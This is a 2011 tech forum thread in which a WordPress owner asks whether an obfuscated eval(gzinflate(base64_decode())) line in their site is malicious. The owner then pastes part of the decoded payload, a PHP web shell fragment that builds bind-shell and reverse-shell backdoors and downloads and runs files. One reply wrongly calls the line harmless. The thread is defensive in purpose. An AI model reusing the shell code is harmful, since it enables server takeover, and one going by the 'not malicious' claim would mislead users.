Solved

Is this Malicious code?

Posted on 2011-03-23
10
398 Views
Last Modified: 2012-05-11
Is this line of code safe:

@eval(gzinflate(base64_decode($code)));

I found it in one of my wordpress files...
0
Comment
Question by:checkmofoshoduno
  • 2
  • 2
  • 2
  • +3
10 Comments
 

Expert Comment

by:eaglerod
ID: 35204600
No this is not malicious code.

The 'Code' represents the scrambled code (aka encoded text, aka obfuscated code) containing random letters, numbers and/or characters.
0
 

Author Comment

by:checkmofoshoduno
ID: 35204603
How can i check to see what the code actually is when its decoded?
0
 
LVL 12

Expert Comment

by:Phil Phillips
ID: 35204630
I'm pretty sure that is malicious.  In fact, from what I can tell, eval(base64_decode(…)) is a common way of 'hacking' Wordpress.

If you have the Suhosin patch, you might want to even consider disabling eval():
http://www.hardened-php.net/suhosin/configuration.html#suhosin.executor.disable_eval
0
 

Expert Comment

by:eaglerod
ID: 35204631
I believe this is what you are looking for.

Decoding Information
0
 
LVL 70

Expert Comment

by:Jason C. Levine
ID: 35204633
Hi checkmofoshoduno,

It's probably code for an advertising link or something similar that some theme developers embed into the theme.  It may not be malicious, but it may be something you don't want there either.

I would find the $code variable and get the string and run it through a decoder, either on another site such as:

http://www.tareeinternet.com/forum/knowledgebase/274-decoding-eval-gzinflate-base64_decode.html

or just as a simple echo statement in a PHP file you create.
0
Enabling OSINT in Activity Based Intelligence

Activity based intelligence (ABI) requires access to all available sources of data. Recorded Future allows analysts to observe structured data on the open, deep, and dark web.

 
LVL 4

Expert Comment

by:m_walker
ID: 35204634
@eval(gzinflate(base64_decode($code)));

try
$Temp = gzinflate(base64_decode($code));
echo $Temp;

Note sure where $code gets its value from.
The code could be binary, so expect some weird results.
0
 

Author Comment

by:checkmofoshoduno
ID: 35204644
Yep i managed to also find that link for the decoder and unless that site is messing with me i am seeing the output say "Load and Exploit" and a bunch of other not so good things such as Port Binding

Looks like i will just remove that block of code for now...

Please see attached.
Process found running, backdoor setup successfully.

"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) { $port = trim($_POST['port']); $passwrd = trim($_POST['bind_pass']); tulis("bdp",$port_bind_bd_pl); exe("chmod 777 bdp"); $p2=which("perl"); exe($p2." bdp ".$port." &"); $scan = exe("ps aux"); if(eregi("$p2 bdp $port",$scan)){ $msg = "

Process found running, backdoor setup successfully.
"; } else { $msg = "

Process not found running, backdoor not setup successfully.
"; } } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcc.c",$back_connect_c); exe("gcc -o bcc bcc.c"); exe("chmod 777 bcc"); @unlink("bcc.c"); exe("./bcc ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']); $port = trim($_POST['backport']); tulis("bcp",$back_connect); exe("chmod +x bcp"); $p2=which("perl"); exe($p2." bcp ".$ip." ".$port." &"); $msg = "Now script try connect to ".$ip." port ".$port." ..."; } elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd'])) { $pilihan = trim($_POST['pilihan']); $wurl = trim($_POST['wurl']); $namafile = download($pilihan,$wurl); if(is_file($namafile)) { $msg = exe($wcmd); } else $msg = "error: file not found $namafile"; } ?>

Open in new window

0
 
LVL 27

Expert Comment

by:Lukasz Chmielewski
ID: 35204821
The additional question - how did it get there ? Change your access passwords to strong ones and do not store them locally on your computer.
0
 
LVL 12

Accepted Solution

by:
Phil Phillips earned 500 total points
ID: 35204927
Roads_Roads brings up a very good point.  You may want to run your site logs through something like OSSEC.

Also, here are some additional tips on how to make Wordpress more secure:
http://codex.wordpress.org/Hardening_WordPress

And, here's a few blog posts that discuss how to recover from a hacked Wordpress installation (hopefully, your installation isn't fully compromised, but these links also have additional security tips):
http://www.snipe.net/2010/01/when-wordpress-gets-hacked/
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ocaoimh.ie/did-your-wordpress-site-get-hacked/
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

In addition to that, you should still consider disabling eval (see my earlier comment), if you can.
0
 
LVL 70

Expert Comment

by:Jason C. Levine
ID: 35208486
It's not necessarily a hack on the site.  I have seen code like this included in many, many free WordPress themes by the theme author.  If you are downloading free stuff directly from an author's web site (and not the WordPress site) make sure you go over it very carefully for exploits.
0

Featured Post

What Should I Do With This Threat Intelligence?

Are you wondering if you actually need threat intelligence? The answer is yes. We explain the basics for creating useful threat intelligence.

Join & Write a Comment

I imagine that there are some, like me, who require a way of getting currency exchange rates for implementation in web project from time to time, so I thought I would share a solution that I have developed for this purpose. It turns out that Yaho…
Part of the Global Positioning System A geocode (https://developers.google.com/maps/documentation/geocoding/) is the major subset of a GPS coordinate (http://en.wikipedia.org/wiki/Global_Positioning_System), the other parts being the altitude and t…
The purpose of this video is to demonstrate how to integrate Mailchimp with WordPress, by placing a Mailchimp signup form on a WordPress Page or Post. This will be demonstrated using a Windows 8 PC. Mailchimp will be used. Log into your Mailchi…
The viewer will learn how to create and use a small PHP class to apply a watermark to an image. This video shows the viewer the setup for the PHP watermark as well as important coding language. Continue to Part 2 to learn the core code used in creat…

759 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

18 Experts available now in Live!

Get 1:1 Help Now